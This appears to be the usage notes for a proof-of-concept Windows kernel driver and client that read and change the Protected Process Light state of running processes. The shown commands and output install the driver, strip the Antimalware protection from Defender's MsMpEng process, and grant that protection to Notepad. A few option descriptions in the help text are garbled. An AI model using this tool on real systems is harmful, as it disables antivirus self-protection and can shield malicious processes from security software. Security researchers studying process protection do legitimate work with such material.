PoCs to manipulate Protected Process.
PS C:\> sc.exe create ProcProtect type= kernel binpath= C:\Dev\ProcProtectDrv_x64.sys
PS C:\> sc.exe start ProcProtect
Client program can get and update Protected Process state.
PS C:\Dev> .\ProcProtectClient.exe -h
ProcProtectClient - Client for ProcProtectDrv.
Usage: ProcProtectClient.exe [Options]
-h, --help : Displays this help message.
-g, --get : Flag to get protection information from process.
-u, --update : Flag to update process protection.
-p, --pid : Specifies a target PID in decimal format. Use with -s flag, or -e and -H flag.
-t, --type : Specifies a ProtectedType in decimal format. Default is 0 (None).
-s, --signer : Specifies a ProtectedSigner in decimal format. Default is 0 (None).
-l, --level : Specifies a SignatureLevel in decimal format. Default is 0.
-S, --section : Specifies a SectionSignatureLevel in decimal format. Default is 0.
[!] -p option is required.
Target PID can be specified with -p
You can check Protected Process state with -g
PS C:\Dev> Get-Process msmpeng
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
1259 80 235000 155956 4212 0 MsMpEng
PS C:\Dev> .\ProcProtectClient.exe -g -p 4212
[>] Sending a query to \??\ProcProtect.
[+] Got a handle to \??\ProcProtect (Handle = 0x2D0)
[+] Got protection information of PID 4212.
[*] Protected Type : ProtectedLight
[*] Protected Signer : Antimalware
[*] Signature Level : 55
[*] Section Signature Level : 7
[*] Done.
To update Protected Process state, set -u
If you only set PID, client program will try to set all parameter to zero:
PS C:\Dev> Get-Process msmpeng
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
1259 80 235000 155956 4212 0 MsMpEng
PS C:\Dev> .\ProcProtectClient.exe -g -p 4212
[>] Sending a query to \??\ProcProtect.
[+] Got a handle to \??\ProcProtect (Handle = 0x2D8)
[+] Got protection information of PID 4212.
[*] Protected Type : ProtectedLight
[*] Protected Signer : Antimalware
[*] Signature Level : 55
[*] Section Signature Level : 7
[*] Done.
PS C:\Dev> .\ProcProtectClient.exe -u -p 4212
[>] Sending a query to \??\ProcProtect.
[+] Got a handle to \??\ProcProtect (Handle = 0x2D0)
[+] Protection of PID 4212 is updated.
[*] Protected Type : None
[*] Protected Signer : None
[*] Signature Level : 0
[*] Section Signature Level : 0
[*] Done.
PS C:\Dev> .\ProcProtectClient.exe -g -p 4212
[>] Sending a query to \??\ProcProtect.
[+] Got a handle to \??\ProcProtect (Handle = 0x2D0)
[+] Got protection information of PID 4212.
[*] Protected Type : None
[*] Protected Signer : None
[*] Signature Level : 0
[*] Section Signature Level : 0
[*] Done.
Protected Process parameters can be specified with following options:
is valid)-s
is valid)-l
is valid)-S
is valid)
PS C:\Dev> Get-Process notepad
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
578 29 14932 76324 0.56 5696 1 Notepad
PS C:\Dev> .\ProcProtectClient.exe -g -p 5696
[>] Sending a query to \??\ProcProtect.
[+] Got a handle to \??\ProcProtect (Handle = 0x2D0)
[+] Got protection information of PID 5696.
[*] Protected Type : None
[*] Protected Signer : None
[*] Signature Level : 2
[*] Section Signature Level : 2
[*] Done.
PS C:\Dev> C:\Dev\ProcProtectClient.exe -u -p 5696 -t 1 -s 3 -l 41 -S 42
[>] Sending a query to \??\ProcProtect.
[+] Got a handle to \??\ProcProtect (Handle = 0x2D0)
[+] Protection of PID 5696 is updated.
[*] Protected Type : ProtectedLight
[*] Protected Signer : Antimalware
[*] Signature Level : 41
[*] Section Signature Level : 42
[*] Done.
PS C:\Dev> .\ProcProtectClient.exe -g -p 5696
[>] Sending a query to \??\ProcProtect.
[+] Got a handle to \??\ProcProtect (Handle = 0x2D4)
[+] Got protection information of PID 5696.
[*] Protected Type : ProtectedLight
[*] Protected Signer : Antimalware
[*] Signature Level : 41
[*] Section Signature Level : 42
[*] Done.